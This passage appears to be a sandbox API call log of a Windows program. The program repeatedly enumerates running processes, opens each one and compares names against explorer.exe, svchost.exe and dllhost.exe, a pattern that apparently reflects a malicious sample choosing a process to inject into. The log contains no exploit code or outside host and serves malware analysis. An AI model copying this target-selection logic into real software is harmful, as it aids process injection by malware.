th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0255.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0255.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0255.618] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0255.618] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.618] CloseHandle (hObject=0xd8) returned 1 [0255.618] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0255.618] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0255.618] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0255.618] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0255.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0255.619] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.619] CloseHandle (hObject=0xd8) returned 1 [0255.619] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0255.619] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0255.619] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0255.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0255.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0255.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0255.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0255.621] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.621] CloseHandle (hObject=0xd8) returned 1 [0255.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0255.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0255.621] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.622] CloseHandle (hObject=0xd8) returned 1 [0255.622] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0255.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0255.622] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.622] CloseHandle (hObject=0xd8) returned 1 [0255.622] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0255.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0255.623] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.623] CloseHandle (hObject=0xd8) returned 1 [0255.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0255.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0255.623] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.623] CloseHandle (hObject=0xd8) returned 1 [0255.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0255.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0255.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.624] CloseHandle (hObject=0xd8) returned 1 [0255.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0255.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0255.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.624] CloseHandle (hObject=0xd8) returned 1 [0255.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0255.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0255.625] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.625] CloseHandle (hObject=0xd8) returned 1 [0255.625] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0255.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0255.626] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.626] CloseHandle (hObject=0xd8) returned 1 [0255.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0255.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0255.626] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.626] CloseHandle (hObject=0xd8) returned 1 [0255.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0255.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0255.627] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.627] CloseHandle (hObject=0xd8) returned 1 [0255.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0255.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0255.627] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.627] CloseHandle (hObject=0xd8) returned 1 [0255.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0255.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0255.628] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.628] CloseHandle (hObject=0xd8) returned 1 [0255.628] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0255.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0255.628] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.628] CloseHandle (hObject=0xd8) returned 1 [0255.628] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0255.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0255.629] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.629] CloseHandle (hObject=0xd8) returned 1 [0255.629] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0255.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0255.630] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.630] CloseHandle (hObject=0xd8) returned 1 [0255.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0255.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0255.630] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.630] CloseHandle (hObject=0xd8) returned 1 [0255.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0255.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0255.631] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.631] CloseHandle (hObject=0xd8) returned 1 [0255.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0255.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0255.631] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.631] CloseHandle (hObject=0xd8) returned 1 [0255.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0255.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0255.632] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.632] CloseHandle (hObject=0xd8) returned 1 [0255.632] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0255.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0255.632] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.632] CloseHandle (hObject=0xd8) returned 1 [0255.633] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0255.633] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0255.633] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0255.634] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0255.634] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0255.635] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0255.635] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.635] CloseHandle (hObject=0xd8) returned 1 [0255.636] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0255.636] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0255.636] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.636] CloseHandle (hObject=0xd8) returned 1 [0255.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0255.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0255.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0255.636] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0255.637] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.637] CloseHandle (hObject=0xd8) returned 1 [0255.637] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0255.637] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.637] CloseHandle (hObject=0xd8) returned 1 [0255.637] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0255.637] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0255.638] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0255.638] CloseHandle (hObject=0xd8) returned 1 [0255.638] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.638] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0255.639] CloseHandle (hObject=0xd4) returned 1 [0255.639] Sleep (dwMilliseconds=0x3e8) [0256.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0256.646] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0256.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0256.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0256.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0256.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0256.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0256.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0256.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0256.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0256.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0256.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 